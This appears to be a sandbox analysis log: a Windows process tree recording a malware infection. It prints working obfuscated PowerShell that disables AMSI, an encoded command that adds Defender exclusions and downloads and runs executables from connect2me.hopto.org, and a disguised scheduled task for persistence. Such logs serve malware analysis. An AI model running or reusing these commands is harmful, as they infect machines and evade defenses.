  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:roaVMzfMvjcq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtsMDSblETQRcB,[Parameter(Position=1)][Type]$PiUDtnGrtp)$rAzelGMfuzE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'ed'+[Char](68)+'ele'+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'em'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+','+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$rAzelGMfuzE.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+'ec'+[Char](105)+'a'+[Char](108)+''+'N'+'am'+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'Pu'+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QtsMDSblETQRcB).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$rAzelGMfuzE.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+'ke',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+''+'d'+''+'e'+''+'B'+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PiUDtnGrtp,$QtsMDSblETQRcB).SetImplementationFlags('Run'+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $rAzelGMfuzE.CreateType();}$ckOApiFfxBsQg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+'f'+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+'e'+'c'+[Char](107)+''+[Char](79)+'A'+[Char](112)+''+'i'+'F'+[Char](102)+''+'x'+''+[Char](66)+''+[Char](115)+''+[Char](81)+''+'g'+'');$oubKmjoQJfzFxC=$ckOApiFfxBsQg.GetMethod(''+[Char](111)+'u'+'b'+''+[Char](75)+''+[Char](109)+''+[Char](106)+''+'o'+'Q'+'J'+'f'+[Char](122)+''+'F'+''+'x'+''+[Char](67)+'',[Reflection.BindingFlags]'P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+'S'+''+[Char](116)+'a'+'t'+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tNdZwANkqHmHRuifpwu=roaVMzfMvjcq @([String])([IntPtr]);$OBjgmkZGbVdZKdspqMisvW=roaVMzfMvjcq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bbSeZyZqDcY=$ckOApiFfxBsQg.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+'o'+'d'+''+[Char](117)+'leH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+'e'+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$bGvuBiTUFJLdvN=$oubKmjoQJfzFxC.Invoke($Null,@([Object]$bbSeZyZqDcY,[Object](''+'L'+''+'o'+'ad'+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$LciXxTsJuyMgSjvji=$oubKmjoQJfzFxC.Invoke($Null,@([Object]$bbSeZyZqDcY,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$aGgQVcM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bGvuBiTUFJLdvN,$tNdZwANkqHmHRuifpwu).Invoke(''+[Char](97)+'m'+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$kJnfLuUQRRjYRtomy=$oubKmjoQJfzFxC.Invoke($Null,@([Object]$aGgQVcM,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+'S'+'ca'+[Char](110)+'B'+[Char](117)+'f'+'f'+'er')));$fyrNQXflgQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LciXxTsJuyMgSjvji,$OBjgmkZGbVdZKdspqMisvW).Invoke($kJnfLuUQRRjYRtomy,[uint32]8,4,[ref]$fyrNQXflgQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$kJnfLuUQRRjYRtomy,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LciXxTsJuyMgSjvji,$OBjgmkZGbVdZKdspqMisvW).Invoke($kJnfLuUQRRjYRtomy,[uint32]8,0x20,[ref]$fyrNQXflgQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'RE').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+'l'+'e'+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fnCodIFoQJXO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IWELBWfgcAfBtE,[Parameter(Position=1)][Type]$zVSAtpFQSj)$ylyluOFSdGA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+[Char](109)+'or'+'y'+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','Cl'+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$ylyluOFSdGA.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+'e'+''+'c'+''+'i'+'alNa'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+'e'+'By'+'S'+''+[Char](105)+''+'g'+''+','+'P'+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$IWELBWfgcAfBtE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$ylyluOFSdGA.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$zVSAtpFQSj,$IWELBWfgcAfBtE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+'e,'+[Char](77)+''+'a'+''+'n'+'ag'+'e'+''+'d'+'');Write-Output $ylyluOFSdGA.CreateType();}$hvxUkdKHosTdg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+'e'+''+[Char](109)+'.d'+'l'+''+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+''+[Char](114)+'os'+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+[Char](85)+'ns'+[Char](97)+''+[Char](102)+''+[Char](101)+'h'+'v'+''+'x'+''+'U'+''+'k'+''+[Char](100)+'K'+[Char](72)+''+[Char](111)+''+[Char](115)+''+[Char](84)+''+[Char](100)+'g');$wfYXKTrBTVxFjy=$hvxUkdKHosTdg.GetMethod(''+[Char](119)+'fY'+[Char](88)+''+[Char](75)+''+[Char](84)+''+'r'+''+'B'+'T'+[Char](86)+''+[Char](120)+''+'F'+''+'j'+'y',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DKBSQKePXiFYxVZJQVG=fnCodIFoQJXO @([String])([IntPtr]);$ccKAKOLMIUuKZkxZHgROeF=fnCodIFoQJXO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ULWQlIWBDmB=$hvxUkdKHosTdg.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+'u'+'l'+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$onywSwygBmlEuh=$wfYXKTrBTVxFjy.Invoke($Null,@([Object]$ULWQlIWBDmB,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$teNsnvsgmeRaCjCEx=$wfYXKTrBTVxFjy.Invoke($Null,@([Object]$ULWQlIWBDmB,[Object]('V'+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$ucIDbpU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($onywSwygBmlEuh,$DKBSQKePXiFYxVZJQVG).Invoke(''+'a'+'m'+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$JwBHvqAChihiGDRNo=$wfYXKTrBTVxFjy.Invoke($Null,@([Object]$ucIDbpU,[Object]('Ams'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$AWwtpjHZgL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($teNsnvsgmeRaCjCEx,$ccKAKOLMIUuKZkxZHgROeF).Invoke($JwBHvqAChihiGDRNo,[uint32]8,4,[ref]$AWwtpjHZgL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JwBHvqAChihiGDRNo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($teNsnvsgmeRaCjCEx,$ccKAKOLMIUuKZkxZHgROeF).Invoke($JwBHvqAChihiGDRNo,[uint32]8,0x20,[ref]$AWwtpjHZgL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+''+'l'+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:392
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:4964
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4500
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2144

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2496

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2668

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2708

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2768

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3396

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4248
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4248 -s 360
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:2216

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4504

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:3656

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:4968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1432

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3232
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3232 -s 772
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:776

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3044
- C:\Users\Admin\AppData\Local\Temp\9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe
  "C:\Users\Admin\AppData\Local\Temp\9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3980
    - - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:816
    - - C:\Users\Admin\AppData\Local\Temp\new2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\new2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4476
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        
        PID:2276
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 492
        6⤵
        Program crash
        
        PID:3060
    - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4824
      - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:5048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3572
    - - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 156
    3⤵
    - Program crash
    PID:4568
